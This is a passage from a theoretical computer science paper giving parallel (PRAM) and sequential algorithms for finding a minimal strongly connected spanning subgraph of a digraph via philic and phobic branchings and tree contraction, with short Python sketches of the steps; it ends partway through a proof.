There is an obvious sequential algorithm for solving this problem: scan the arcs one by one; at step $i$ test if the $i$-th arc can be removed without destroying strong connectivity. If so, remove it and update the digraph. This algorithm has complexity $O((n+m)^2)$, where $n$ is the number of vertices of the input graph and $m$ is the number of arcs. A simple modification is to initially reduce the number of arcs to at most $2n-2$ by taking the union of a forward and an inverse branching (defined below). This reduces the running time to $O(n^2)$.
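The obvious scan-and-test algorithm above can be sketched in a few lines. This is a minimal pure-Python sketch, not taken from the paper; the graph representation and function names are mine, and the strong-connectivity test is the standard "reach all vertices from a root in both the digraph and its reverse" check.

```python
def is_strongly_connected(vertices, arcs):
    """True iff every vertex is reachable from an arbitrary root
    in both the digraph and its reverse."""
    if not vertices:
        return True
    fwd, rev = {}, {}
    for u, v in arcs:
        fwd.setdefault(u, set()).add(v)
        rev.setdefault(v, set()).add(u)

    def reaches_all(adj):
        root = next(iter(vertices))
        seen, stack = {root}, [root]
        while stack:
            u = stack.pop()
            for v in adj.get(u, ()):
                if v not in seen:
                    seen.add(v)
                    stack.append(v)
        return seen == set(vertices)

    return reaches_all(fwd) and reaches_all(rev)

def transitive_reduction_naive(vertices, arcs):
    """Scan the arcs one by one; drop an arc whenever the remaining
    subgraph stays strongly connected (O((n+m)^2) overall)."""
    kept = list(arcs)
    for e in list(arcs):
        trial = [a for a in kept if a != e]
        if is_strongly_connected(vertices, trial):
            kept = trial
    return kept
```

For example, on a directed 4-cycle with one chord, the scan removes exactly the chord and keeps the cycle, which is a minimal strongly connected spanning subgraph.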
The problem studied here is reminiscent of the well-studied problem of finding a maximal independent set of vertices in a graph, for which several parallel algorithms have appeared in the literature ([KW],[Lu],[ABI],[GS]). Two common features are that there is a simple sequential algorithm for it that seems hard to parallelize and that the related optimization problem (minimum vs. minimal) is NP-hard.
We can define the following independence relation on the arcs of a strongly connected digraph, $G$: a set of arcs is independent if it can be removed without destroying strong connectivity of $G$. Using this definition, finding a transitive reduction of $G$ is equivalent to removing a maximal independent set of arcs from $G$. A property that sets our problem apart from the maximal independent set problem is that in our case independence of a set is not guaranteed when every pair of elements in it is independent.
Our problem can be expressed as the determination of a maximal independent set in an independence system as defined by Karp, Upfal and Wigderson ([KUW]). Computing the "rank oracle" for this system is NP-hard, but the "independence oracle" is easy to compute in NC. Following the method described in [KUW], this automatically yields a randomized parallel algorithm that uses a polynomial number of processors and runs in time $O(\sqrt{n} \cdot \log^c n)$ (for some constant $c$).
In this paper we present parallel and sequential algorithms for this problem. Our first parallel algorithm runs in time $O(\log^5 n)$ and uses $O(n^3)$ processors on a CREW PRAM. We then present an improved implementation of one of the steps in the algorithm that leads to a parallel algorithm that runs in $O(\log^4 n)$ time with the same processor bound. Both of these algorithms can be sped up by a $\log n$ factor if we use a CRCW PRAM; we assume here the COMMON
concurrent-write model in which all processors participating in a concurrent write must write the same value [KR]. The processor bound of $O(n^3)$ represents the number of processors needed to multiply two $n$ by $n$ matrices in $O(\log n)$ time on a CREW PRAM by the straightforward parallel matrix multiplication algorithm. It is possible that the processor bound can be improved by using sophisticated techniques for multiplying $n$ by $n$ matrices (see e.g., [CW]); we do not elaborate on this.
The major tool that our algorithms use is computing a minimum-weight branching with zero-one weights. Central to our algorithms is a proof that two suitable applications of this tool are guaranteed to reduce by half the number of arcs still to be removed. We also present two sequential algorithms for the problem, each of which runs in time $O(m+n\cdot \log n)$. This is an improvement over the straightforward algorithm mentioned above.
The transitive reduction problem is, in some sense, a dual of the minimum strong augmentation problem - add a minimum set of arcs to a digraph to make it strongly connected. A linear time sequential algorithm was given for this problem by Eswaran and Tarjan ([ET]), and a parallel algorithm running in $O(\log n)$ time with $O(n^3)$ processors on a CRCW PRAM was given by Soroker ([So]).
Our problem extends naturally to general digraphs: given a digraph $G$, find a minimal spanning subgraph of it whose transitive closure is the same as that of $G$. A sequential algorithm for this problem in the case that $G$ is acyclic is given in [AGU] and can be parallelized in a straightforward manner. Combining it with our algorithms we obtain parallel algorithms (with the same complexities as stated above) for the transitive reduction problem on general digraphs. We point out that these parallel algorithms are good with respect to the state of the art, since the problem solved is at least as hard as testing reachability from one vertex to another in a digraph, and the best NC algorithm currently known for this requires on the order of $M(n)$ processors, where $M(n)$ is the number of processors needed to multiply two $n$ by $n$ Boolean matrices in $O(\log n)$ time.
We note that the name "transitive reduction" was given to a different problem by Aho, Garey and Ullman ([AGU]), and should not be confused with our definition. Given a digraph $G$, they ask for a digraph with a minimum number of arcs (not necessarily a subgraph of $G$) whose transitive closure is the same as that of $G$. This definition agrees with ours when $G$ is acyclic.
Definitions
Let $G$ be a strongly connected digraph. A forward (inverse) branching rooted at $x$ is a spanning tree of $G$ in which $x$ has in-degree (out-degree) zero and all other vertices have in-degree (out-degree) one. A branching is either a forward or an inverse branching. Throughout this paper the root, $x$, will be some (arbitrarily) fixed vertex of the input digraph, and the set of all
branchings will be taken to be only those rooted at $x$.
An arc, $e$, is **G-redundant** (or simply **redundant** when the graph is clear) if $G-\{e\}$ is strongly connected. Arc $e$ is **G-essential** (or **essential**) if it is not redundant. Let $H$ be a subgraph of $G$. Let $r_G(H)$ denote the number of $G$-redundant arcs in $H$. When $H=G$ we will use the shorthand $r(G)$.
An **$H$-philic** ($H$-phobic) branching in $G$ is one that has the greatest (smallest) number of arcs in common with $H$ over all branchings (rooted at $x$) in $G$.
Our model of parallel computation is the Parallel Random Access Machine (PRAM), which consists of a collection of independent processing elements communicating through a shared memory. For a survey on the PRAM model and PRAM algorithms see [KR].
2. The Transitive Reduction Algorithm
Our basic algorithm is based solely on computing philic and phobic branchings. The following lemma explains how these branchings are computed:
**Lemma 0:** An $H$-philic ($H$-phobic) branching can be computed by a minimum-weight branching computation with zero-one weights.
**Proof:** Assign weight 0 (1) to every arc in $H$ and weight 1 (0) to all other arcs. []
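The weight assignment in the proof of Lemma 0 is mechanical; the sketch below (function and parameter names are mine) just produces the zero-one weight map that would be fed to a minimum-weight branching routine such as Lovász's, which is not shown here.

```python
def branching_weights(arcs, H, philic=True):
    """Zero-one arc weights from Lemma 0: under these weights a
    minimum-weight branching is H-philic (philic=True), since arcs
    of H cost 0 and all others cost 1; swapping the costs makes the
    minimum-weight branching H-phobic."""
    H = set(H)
    return {e: 0 if (e in H) == philic else 1 for e in arcs}
```

A minimum-weight branching then maximizes (respectively minimizes) the number of its arcs lying in $H$, because all branchings rooted at $x$ have the same number of arcs.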
Such a minimum-weight branching can be computed in time $O(\log^2 n)$ using $O(n^3)$ processors on a CRCW PRAM by Lovasz’s method ([Lo]). On a CREW PRAM, this algorithm runs in $O(\log^3 n)$ time.
**Proposition 1:** An arc of $G$ is essential if and only if it is the unique arc crossing some directed cut of $G$.
**Proposition 2:** The union of a forward branching and an inverse branching of $G$ is a strongly connected spanning subgraph of $G$.
**Proposition 3:** Let $G'$ be a strongly connected spanning subgraph of $G$. Then $e$ is $G'$-redundant only if it is $G$-redundant.
**Lemma 1:** Let $F$ be a forward branching in $G$ and let $I$ be an $F$-philic inverse branching in $G$. Let $G'=F \cup I$. Then the arcs of $I-F$ are all $G'$-essential.
Proof: Let \( e \in I - F \). Assume \( G' - \{ e \} \) contains some inverse branching, \( I' \). Then \( I' \) has one more arc in common with \( F \) than \( I \) does (since all branchings have the same number of arcs). But this contradicts the fact that \( I \) is \( F \)-philic. Thus \( G' - \{ e \} \) contains no inverse branching and is therefore not strongly connected. []
A cut leaving \( S \) is the set of arcs extending from \( S \) to \( V(G) - S \) in a digraph, \( G \), and its cardinality is denoted by \( \delta_G(S) \).
**Theorem 1 (Edmonds' Branching Theorem ([Ed])):**
Let
\[
k = \min \{ \delta_G(S) \mid x \in S, S \subsetneq V(G) \}.
\]
Then \( G \) contains \( k \) arc-disjoint forward branchings (rooted at \( x \)).
**Lemma 2:** For every strongly connected digraph, \( G \), there exists a forward branching, \( F \), of \( G \) such that \( r_G(F) \leq \frac{1}{2} r(G) \).
**Proof:** Let \( G' \) be obtained from \( G \) by duplicating all essential arcs. Let \( S \) be a proper subset of \( V(G) \) containing x. We claim that \( \delta_{G'}(S) \geq 2 \). This is because the cut leaving \( S \) must contain at least one duplicated essential arc of \( G \) or at least two redundant arcs (by proposition 1). Therefore, by theorem 1, there are two arc-disjoint forward branchings in \( G' \) (each corresponding to a branching in \( G \)), one of which must contain at most half of the (unduplicated) \( G \)-redundant arcs.[]
**Theorem 2:** Let \( R \) be the set of redundant arcs in \( G \). Let \( F \) be an \( R \)-phobic forward branching and let \( I \) be an \( F \)-philic inverse branching. Let \( G' = F \cup I \). Then \( r(G') \leq \frac{1}{2} r(G) \).
**Proof:** First note that by proposition 2, \( G' \) is strongly connected. By lemma 2 and proposition 3, \( r_{G'}(F) \leq r_G(F) \leq \frac{1}{2} r(G) \). By lemma 1, \( r(G') = r_{G'}(F) \). Therefore \( r(G') \leq \frac{1}{2} r(G) \). []
It is an immediate consequence of theorem 2 that the following NC algorithm gives a transitive reduction of \( G \):
**Repeat**
1. \( R \leftarrow \) set of redundant arcs in \( G \)
2. \( F \leftarrow R \)-phobic forward branching in \( G \)
3. \( I \leftarrow F \)-philic inverse branching in \( G \)
4. \( G \leftarrow F \cup I \)
until \( R = \emptyset \)
5. output \( G \) (it is a transitive reduction of the input digraph)
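The repeat loop above can be mocked up directly for small digraphs. In the sketch below (all names are ours), the minimum-weight branching computations of steps 2 and 3 are replaced by brute-force enumeration of all branchings rooted at $x$, so it only illustrates the logic of Theorem 2, not an efficient implementation; the input is assumed strongly connected.

```python
from itertools import product

def reachable(n, arcs, s):
    """Vertices reachable from s via the given arcs (iterative DFS)."""
    adj = {v: [] for v in range(n)}
    for u, w in arcs:
        adj[u].append(w)
    seen, stack = {s}, [s]
    while stack:
        u = stack.pop()
        for w in adj[u]:
            if w not in seen:
                seen.add(w)
                stack.append(w)
    return seen

def strongly_connected(n, arcs):
    rev = [(w, u) for u, w in arcs]
    return len(reachable(n, arcs, 0)) == n and len(reachable(n, rev, 0)) == n

def forward_branchings(n, arcs, x):
    """Enumerate all forward branchings rooted at x: pick one incoming
    arc per vertex other than x and keep the choices spanning from x."""
    choices = [[(u, w) for (u, w) in arcs if w == v]
               for v in range(n) if v != x]
    for pick in product(*choices):
        if len(reachable(n, list(pick), x)) == n:
            yield set(pick)

def inverse_branchings(n, arcs, x):
    rev = [(w, u) for u, w in arcs]
    for b in forward_branchings(n, rev, x):
        yield {(w, u) for (u, w) in b}

def redundant(n, arcs):
    return {e for e in arcs
            if strongly_connected(n, [f for f in arcs if f != e])}

def transitive_reduction(n, arcs, x=0):
    G = set(arcs)
    while True:
        R = redundant(n, G)
        if not R:
            return G
        F = min(forward_branchings(n, list(G), x),
                key=lambda b: len(b & R))          # R-phobic
        I = max(inverse_branchings(n, list(G), x),
                key=lambda b: len(b & F))          # F-philic
        G = F | I                                  # halves r(G) by Theorem 2
```

On the cycle-plus-chord example, one pass already discards the chord and the loop terminates with the 3-cycle, which has no redundant arcs.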
By Theorem 2 the repeat loop runs \( O(\log n) \) times, where \( n \) is the number of vertices in \( G \). Steps (2) and (3) are implemented with Lovasz's minimum-weight branching algorithm (lemma 0). The straightforward implementation of step (1) is to perform a strong connectivity test (transitive closure) with each vertex of the graph deleted in turn, which requires \( n \cdot M(n) \) processors. In the next section we shall show how to perform this step more efficiently.
3. Efficient Classification of Arcs
In this section we give parallel algorithms to classify the arcs of \( G \) as essential or redundant in poly-log time using only \( O(n^3) \) processors. In section 3.1 we provide a simple polylog time parallel algorithm using \( O(n^3) \) processors. In section 3.2 we provide a faster algorithm using tree contraction [MR].
3.1. Finding Redundant Arcs Using Minimum Weight Branchings
Let \( E_f \) (\( E_i \)) be the set of essential arcs contained in all forward (inverse) branchings. It follows from proposition 2 that:
**Proposition 4:** An arc is essential if it is either in \( E_f \) or in \( E_i \) (or both).
**Lemma 3:** Let \( H \) be a set of arcs containing \( E_f \) and let \( F \) be an \( H \)-phobic forward branching in \( G \). Then \( |(F \cap H) - E_f| \leq \frac{1}{2} |H - E_f| \).
**Proof:** Let \( G' \) be obtained from \( G \) by duplicating all the arcs in \( E_f \). As in lemma 2, there exist two arc-disjoint forward branchings in \( G' \) (corresponding to branchings in \( G \)), one of which contains at most half the arcs of \( H - E_f \).
Therefore \( E_f \) (and similarly \( E_i \)) can be computed by the following algorithm:
(1) $H \leftarrow G$
(2) repeat steps (3) and (4) $\lceil \lg m \rceil$ times:
(3) $F \leftarrow H$-phobic forward branching in $G$
(4) $H \leftarrow H \cap F$
(5) output $H$ (this is the set $E_f$)
This algorithm requires $O(\log n)$ applications of Lovasz’s minimum weight branching algorithm, which runs in $O(\log^2 n)$ parallel time on a CRCW PRAM with $O(n^3)$ processors. Thus we can use this algorithm to find all redundant arcs in $O(\log^3 n)$ parallel time on a CRCW PRAM with $O(n^3)$ processors. This in turn leads to a transitive reduction algorithm that runs in $O(\log^4 n)$ parallel time on a CRCW PRAM with $O(n^3)$ processors.
3.2. Finding Redundant Arcs Using Tree Contraction
Let $r$ be a fixed root of a directed graph $G=(V,E)$. We call arc $(v,w)$ an out-bridge if $(v,w)$ is on every path from $r$ to $w$, and an in-bridge if $(v,w)$ is on every path from $v$ to $r$. Let $O$ be the set of out-bridges of $G$, and $I$ the set of in-bridges of $G$. Then the set of redundant arcs is the set $E - (I \cup O)$.
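This characterization yields a simple sequential classifier for a strongly connected input (names below are ours): $(v,w)$ is an out-bridge iff $w$ becomes unreachable from $r$ once $(v,w)$ is deleted, and the in-bridges are exactly the out-bridges of the reversed digraph.

```python
def reachable(n, arcs, s):
    """Vertices reachable from s via the given arcs (iterative DFS)."""
    adj = {v: [] for v in range(n)}
    for u, w in arcs:
        adj[u].append(w)
    seen, stack = {s}, [s]
    while stack:
        u = stack.pop()
        for w in adj[u]:
            if w not in seen:
                seen.add(w)
                stack.append(w)
    return seen

def out_bridges(n, arcs, r):
    """Arcs (v,w) lying on every path from r to w."""
    return [(v, w) for (v, w) in arcs
            if w not in reachable(n, [f for f in arcs if f != (v, w)], r)]

def in_bridges(n, arcs, r):
    """Arcs (v,w) lying on every path from v to r."""
    rev = [(w, v) for v, w in arcs]
    return [(v, w) for (w, v) in out_bridges(n, rev, r)]

def redundant_arcs(n, arcs, r):
    """E - (I union O), valid when the input is strongly connected."""
    bridges = set(out_bridges(n, arcs, r)) | set(in_bridges(n, arcs, r))
    return [e for e in arcs if e not in bridges]
```

On the cycle-plus-chord example rooted at 0, $(0,1)$ is the only out-bridge, $(1,2)$ and $(2,0)$ are the in-bridges, and the chord $(0,2)$ is the only redundant arc, agreeing with the direct strong-connectivity test.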
Let $B$ be a forward branching rooted at $r$. Then every out-bridge of $G$ lies in $B$. We can view $B$ as a rooted directed tree $B=(V,E',r)$. For a vertex $v$ in $V -\{r\}$, we denote by $\text{parent}(v)$, the parent of $v$ in $B$. A vertex $v$ is active if there is a path from $r$ to $v$ that avoids arc $(\text{parent}(v),v)$. Similarly, a non-tree arc $(w,v)$ is active if it lies on a path from $r$ to $v$ that avoids arc $(\text{parent}(v),v)$.
Lemma 4: Let $B=(V,E',r)$ be a forward branching in a directed graph $G$. A tree arc $e=(\text{parent}(v),v)$ in $B$ is an out-bridge of $G$ if and only if $v$ is not active.
Proof: If $e$ is an out-bridge of $G$ then every path from $r$ to $v$ passes through $e$. Thus $v$ cannot be active. Conversely, if $e$ is not an out-bridge, then there exists a path from $r$ to $v$ that avoids $e$ and hence $v$ must be active.[]
We now give an algorithm to identify all active vertices, and hence all out-bridges, using tree contraction [MR]. An analogous computation on an inverse branching rooted at $r$ gives the in-bridges, from which we can compute the redundant arcs in $G$.
We shall use a variant of tree contraction proposed in [Ra] in which the basic operation is shrink, which we now define. A leaf chain in a rooted tree $T=(V,E,r)$ is a path $<v_1, \ldots, v_l>$ such that each $v_i, i > 1$ has exactly one incoming arc and one outgoing arc in $T$, $v_1$ has either no incoming arc or more than one outgoing arc in $T$, and $v_l$ is a leaf in $T$. We will call $v_1$ the root, and $v_l$
the leaf of the leaf chain. Note that every leaf in $T$ is part of a leaf chain, possibly a degenerate one (if $l=2$).
The shrink operation applied to a rooted tree $T=(V,E,r)$ removes all vertices in each leaf chain in $T$ except the root of the leaf chain. It can be shown that $O(\log n)$ applications of the shrink operation suffice to reduce any $n$-node tree to a single node [Ra].
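The shrink operation can be prototyped sequentially on a tree given as a child-to-parent map (representation and helper names are ours): each round walks up from every leaf through vertices that have exactly one child and deletes the whole chain except its root.

```python
def children_of(parent, root):
    """Child lists from a child -> parent map (root has no entry)."""
    kids = {root: []}
    for v in parent:
        kids.setdefault(v, [])
    for v, p in parent.items():
        kids.setdefault(p, []).append(v)
    return kids

def shrink(parent, root):
    """One shrink round: delete every leaf chain except its chain root."""
    kids = children_of(parent, root)
    gone = set()
    for leaf in [v for v in kids if not kids[v] and v != root]:
        gone.add(leaf)
        u = parent[leaf]
        # walk up through internal chain vertices (exactly one child each)
        while u != root and len(kids[u]) == 1:
            gone.add(u)
            u = parent[u]
    return {v: p for v, p in parent.items() if v not in gone}

def shrink_rounds(parent, root):
    """Rounds needed to contract the whole tree to its root."""
    k = 0
    while parent:
        parent = shrink(parent, root)
        k += 1
    return k
```

A bare path collapses in a single round (it is one leaf chain), while a complete binary tree of depth $d$ needs $d$ rounds; in general $O(\log n)$ rounds suffice, as cited from [Ra].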
We now develop an algorithm Shrink(P) for identifying out-bridges for the case when the forward branching is a simple path. We shall then use this to find the out-bridges in leaf chains while implementing the shrink operation in a tree contraction algorithm to find out-bridges in $G$ given an arbitrary forward branching.
The input to algorithm Shrink(P) is a directed graph $P=(V,E)$ consisting of a directed path $p=<1,2,\cdots,t>$, together with a collection of forward arcs of the form $(i,j), i<j$, and a collection of back arcs of the form $(i,j), i>j$. The algorithm Shrink(P) will identify all active vertices, thereby giving the out-bridges in $p$. Note that $P$ is allowed to have two arcs of the form $(i,i+1)$, one of which is a forward arc and the other lies in $p$. We will need this when we apply algorithm Shrink(P) to the general problem of finding out-bridges in a graph with an arbitrary forward branching.
We now make a series of observations.
**Observation 1:** Every forward arc is active.
Let $p(u)$ be the subgraph of $P$ induced by vertices $u$ through $t$. For each vertex $v$ in $p(u)$, let $v\rightarrow u$ if $u$ is reachable from $v$ in $p(u)$. Let $reach(u)$ be the set of vertices $v$ in $p(u)$ with $v\rightarrow u$.
**Observation 2:** $reach(u)$ is a single interval of the form $[u,u']$. Further, a vertex $v\neq u$ is in $reach(u)$ if and only if there exists a sequence of back arcs $b_i=(u_i,v_i)$, $i=1,\cdots,k$, such that $v_1=u$, $u_k\geq v$, and $u_i\geq v_{i+1}$ for $i=1,\cdots,k-1$.
**Lemma 5:** A vertex $u$ is active if and only if there is a forward arc $(k,l)$ with $k<u$ and $l$ in $reach(u)$.
**Proof:** Let $u$ be an active vertex. Then there is a path $q$ from the root to $u$ that avoids arc $(u-1,u)$. This in turn implies that $q$ must contain a forward arc $f=(k,l)$ with $k<u$, $l\geq u$ and with $u$ reachable from $l$ using only arcs in $p(u)$. Hence $l$ must be in $reach(u)$.
Conversely suppose there is a forward arc $f=(k,l)$ with $k<u$ and $l$ in $reach(u)$. Hence there is a path $q$ from $l$ to $u$ using only arcs in $p(u)$. Then the path consisting of arcs in $p$ from the root to $k$, followed by arc $f$ and then the path $q$ is a path from 1 to $u$ that avoids arc $(u-1,u)$. Hence $u$ must be an active vertex.[]
Observations 1 and 2 and Lemma 5 together give us the following algorithm to find all out-bridges when the forward branching is a simple path.
Shrink(P);
1. Find $reach(u)$ for each vertex $u$ as follows:
a) For each back arc $b=(i,j)$ find a back arc $next(b)=(i',j')$ with $j'$ in $[j,i]$ and maximum $i'$. If $i'\leq i$ then set $next(b)=\emptyset$.
b) Form an auxiliary graph with a vertex for each back arc $b$ and an arc from $b$ to $next(b)$, if $next(b)$ exists. This auxiliary graph is a forest of trees.
c) For each vertex $u$, pick some back arc $b=(v,u)$ incident on $u$, and find the root $b'$ of the tree it belongs to. Let $b'$ be the back arc $(x,y)$. Set $reach(u)=[u,x]$.
If there is no back arc incident on $u$ set $reach(u)=[u,u]$.
2. For each vertex $u$, find a forward arc $f=(k,l)$ with $l$ in $reach(u)$ and with minimum $k$. If $k<u$ mark $u$ as active.
3. For each vertex $u$ that is not active, mark the arc $(u-1,u)$ as an out-bridge.
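Before turning to the parallel implementation, here is a sequential, brute-force rendering of Shrink(P) (ours, useful as a reference check): $reach(u)$ is computed by a plain backward search inside $p(u)$ instead of the pointer-jumping of steps 1a-1c, and activity is tested directly against Lemma 5.

```python
def shrink_p(t, forward, back):
    """Out-bridges of the path <1,...,t> augmented with forward/back arcs."""
    path = [(i, i + 1) for i in range(1, t)]
    bridges = []
    for u in range(2, t + 1):
        # restrict to p(u): arcs whose endpoints both lie in [u, t]
        arcs = [(a, b) for (a, b) in path + forward + back
                if a >= u and b >= u]
        rev = {v: [] for v in range(u, t + 1)}
        for a, b in arcs:
            rev[b].append(a)
        seen, stack = {u}, [u]           # reach(u): who can reach u in p(u)
        while stack:
            x = stack.pop()
            for y in rev[x]:
                if y not in seen:
                    seen.add(y)
                    stack.append(y)
        # Lemma 5: u is active iff some forward arc (k,l) has k < u, l in reach(u)
        if not any(k < u and l in seen for (k, l) in forward):
            bridges.append((u - 1, u))
    return bridges
```

For instance, on the path $\langle1,2,3,4\rangle$ with forward arc $(1,3)$ and back arc $(4,2)$, vertices 2 and 3 are active (via $1\to3\to4\to2$ and $(1,3)$ respectively), so only $(3,4)$ is an out-bridge.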
We now show how to implement each of the steps in the algorithm efficiently in parallel. Step 3 can be implemented trivially in constant time with $t$ processors. The following method implements step 2 in $O(\log t)$ time with a number of processors linear in the size of $P$: Initially we determine, for each vertex $u$, the forward arc $(v,u)$ with minimum $v$ (if such an arc exists). It is straightforward to compute this in $O(\log t)$ time with a linear number of processors. Then by a doubling computation we compute, for each interval $[u,u+2^j]$, $1\leq j \leq \lceil \log t \rceil$, $1\leq u \leq t-2^j$, the forward arc $(v,x)$ with minimum $v$ such that $x$ is in the interval $[u,u+2^j]$. This computation can be done in $O(\log t)$ time with a linear number of processors on a CREW PRAM. Any interval $[i,j]$, $1\leq i < j \leq t$, can be written as the overlapping union of two of the previously computed intervals, and hence each vertex can now find a forward arc as required in step 2 in constant time.
Step 1 can be implemented in $O(\log t)$ time with a linear number of processors on a CREW PRAM as follows. Step 1a can be performed in a manner analogous to step 2. Step 1b can be implemented in constant time with a linear number of processors. Step 1c can be implemented by pointer jumping in $O(\log t)$ time with a linear number of processors. Thus we have a parallel algorithm for Shrink(P) that runs in $O(\log t)$ time with a linear number of processors on a CREW PRAM.
We now incorporate the Shrink algorithm in the following tree contraction algorithm that finds the out-bridges in an arbitrary forward branching of a directed graph $G$ rooted at $r$. The algorithm constructs a sequence of pairs $(G_k,T_k)$, where $G_k$ is a digraph and $T_k$ is a forward branching; $G_1$ is the input digraph and $T_1$ is a forward branching of $G$ rooted at a fixed vertex $r$. Iteration $k$ identifies the leaf chains of $T_k$, determines the out-bridges of $G_k$ within those leaf chains, deletes all the vertices of the leaf chains except their roots, and then performs a transitive
closure computation and adds appropriate arcs to ensure that the out-bridges in $G_{k+1}$ are precisely the out-bridges of $G$ not yet identified.
Outbridges$(G=(V,E,r),T)$;
**Input:** A directed graph $G=(V,E)$ with a forward branching $T$ rooted at $r$; $|V|=n$.
**Repeat**
1. **Find out-bridges in the leaf chains of $T$:**
For each leaf chain $l$ in $T$ pardo
Let $t$ be the root of $l$ and $t'$ the leaf of $l$. Let $L'$ be the subgraph of $G$ induced by vertices in $l$.
a) Form $L$ from $L'$ by introducing a forward arc $(t,y)$ for each non-tree arc $(x,y)$ in $G$ with $y$ in $V(l) - \{t\}$ and $x$ not in $V(l)$.
b) Apply Shrink$(L)$ to find the out-bridges in $L$ and label these as out-bridges of $G$.
2. **Remove leaf chains from $T$:**
a) Form the graph $H$ with vertex set $V$ and arc set the arcs in all leaf chains and all non-tree arcs of $G$.
b) Form $M$, the adjacency matrix of $H$, and form the transitive closure $M^*$ of $M$.
c) For each vertex $v$, determine, using $M^*$, the set of vertices from which $v$ is reachable in $H$. For each such vertex $w$, introduce an arc $(w,v)$ in $G$.
d) For each vertex $t$ that is the root of some leaf chain, delete all incoming non-tree arcs to proper descendants of $t$. Collapse all of these proper descendants into $t$. Delete any self-loops in this graph.
until $T=\emptyset$
Generalizing our earlier notation for the case when the forward branching is a simple path, we now let $p(u)$ be the subgraph of $G$ induced by those vertices that lie in the subtree of $T$ rooted at $u$. For each vertex $v$ in $p(u)$, let $v\rightarrow u$ if $u$ is reachable from $v$ in $p(u)$. Let $reach(u)$ be the set of vertices $v$ in $p(u)$ with $v\rightarrow u$.
The following lemma is a straightforward generalization of Observation 2 and Lemma 5 (here a vertex $v$ is a descendant of a vertex $u$ if $u=v$ or if there is a directed path from $u$ to $v$ in $T$; otherwise $v$ is a non-descendant of $u$).
**Lemma 6:** A vertex $u$ in $G$ is active if and only if there is an arc $(x,y)$ with $x$ a non-descendant of $u$ and with $y$ in $reach(u)$.
Let $G$ be a directed graph with a forward branching $T$ rooted at $r$, and let $v$ be a vertex in $G$. An active path to $v$ is a path $p$ from $r$ to $v$ consisting of an initial path $p'$ using tree arcs from $r$ to a non-descendant $x$ of $v$ followed by an intermediate path consisting of a single non-tree arc $a$ from $x$ to a descendant $y$ of $v$ followed by a final path $p''$ from $y$ to $v$ using only arcs connecting descendants of $v$.
Observation 3: Vertex $v$ is active if and only if there is an active path to $v$.
We now prove some lemmas that will allow us to establish the correctness of algorithm Outbridges. As before let $G_i$ and $T_i$ be the graph and forward branching present at the start of the $i$th iteration of the repeat loop in the algorithm; hence $G_1$ and $T_1$ are the input graph together with its forward branching, and $G_k$ and $T_k$ are the current graph and forward branching at the start of the $k$th iteration. Similarly let $H_i$ be the graph $H$ of step 2a of algorithm Outbridges constructed in the $i$th iteration of the repeat loop.
We first note that Observation 2 remains valid in each $G_k$ when $u$ is a vertex in a leaf chain of $T_k$. We state this in the following observation.
Observation 4: Let $u$ be a vertex in a leaf chain $l$ of forward branching $T$, where for convenience we assume that the vertices in the leaf chain are numbered from 1 to $s$, with 1 the root of the leaf chain and $s$ the leaf of the leaf chain. Then $\text{reach}(u)$ is a single interval of the form $[u, u']$. Further, a vertex $v \neq u$ is in $\text{reach}(u)$ if and only if there exists a sequence of back arcs $b_i = (u_i, v_i)$, $i = 1, \ldots, k$, in $L$ (where $L$ is the subgraph of $G$ induced by vertices in $l$) such that $v_1 = u$, $u_k \geq v$, and $u_i \geq v_{i+1}$ for $i = 1, \ldots, k - 1$.
Lemma 7: For each $k \geq 1$, algorithm Outbridges correctly finds the out-bridges in the leaf chains of $G_k$.
Proof: By Observation 4, for a vertex $u$ in a leaf chain $l$ of $T_k$, $\text{reach}(u)$ in $G_k$ is the same as $\text{reach}(u)$ in the subgraph of $G_k$ induced by $l$. Hence the reach value of each vertex in the leaf chain is correctly computed in the Shrink computation of step 1b in algorithm Outbridges.
By Lemma 6, a vertex $u$ in a leaf chain is active if and only if there is an arc $e = (x, y)$ in $G_k$ with $x$ a non-descendant of $u$ and with $y$ in $\text{reach}(u)$. Such an arc $e$ is either a forward arc in the leaf chain or is an arc with $x$ not in the leaf chain and $y$ in the leaf chain. The former case is the same as that used in the Shrink algorithm. In the latter case, $(x, y)$ will cause any vertex $u$ in the leaf chain with $y$ in $\text{reach}(u)$ to be active. Hence for the purpose of the Shrink algorithm this is equivalent to having an arc from the root, $t$, of the leaf chain to $y$. Thus the computation in steps 1a and 1b of algorithm Outbridges correctly finds the out-bridges in the leaf chains of $G_k$.[]
Lemma 8: Let $e = (u, v)$ be an out-bridge in $G_k$ for $k > 1$. Then $e$ is an out-bridge in $G_{k-1}$.
Proof: First note that if $e$ is an out-bridge in $G_k$, then $e$ lies in $T_k$. Hence $e$ lies in $T_{k-1}$, since every tree arc in $T_k$ is present as a tree arc in $T_{k-1}$.
Suppose \( e \) is not an out-bridge in \( G_{k-1} \). Hence \( v \) is an active vertex in \( G_{k-1} \). Let \( p \) be an active path to \( v \) in \( G_{k-1} \), and let \( p \) consist of an initial tree path \( p' \) to a vertex \( x \) that is a non-descendant of \( v \), followed by a non-tree arc \( a=(x,y) \), where \( y \) is a descendant of \( v \), followed by a final path \( p'' \) from \( y \) to \( v \) using only arcs connecting vertices that are descendants of \( v \). We now establish that there must be an active path to \( v \) in \( G_k \), contradicting the assumption that \( e \) is an out-bridge of \( G_k \), and thereby establishing the lemma.
If \( p \) contains no vertex in \( G_{k-1}-G_k \) then \( p \) is an active path to \( v \) in \( G_k \) as well. If \( p \) contains some vertices in \( G_{k-1}-G_k \) then consider the last vertex \( z \) on \( p \) such that \( z \) is in \( G_{k-1}-G_k \).
**Case 1:** \( z \) is a non-descendant of \( v \). Then \( z \) must be \( x \) and all vertices in \( p'' \) lie in \( G_k \). Let \( t \) be the root of the leaf chain of \( G_{k-1} \) to which \( z \) belongs. Then by step 2d of algorithm Outbridges, \( z \) is collapsed into \( t \) and hence the path in \( G_k \) consisting of the tree path to \( t \), followed by non-tree arc \((t,y)\), followed by path \( p'' \) is an active path to \( v \) in \( G_k \).
**Case 2:** \( z \) is a descendant of \( v \). Let \( b=(z,a) \) be the outgoing arc from \( z \) in \( p \), and let \( t' \) be the root of the leaf chain in \( G_{k-1} \) to which \( z \) belongs. Hence \( t' \) is a descendant of \( a \) and \( z \) is a proper descendant of \( t' \). Let \( p''' \) be the portion of \( p'' \) from \( a \) to \( v \). The path \( p''' \) is a path in \( G_k \) as well.
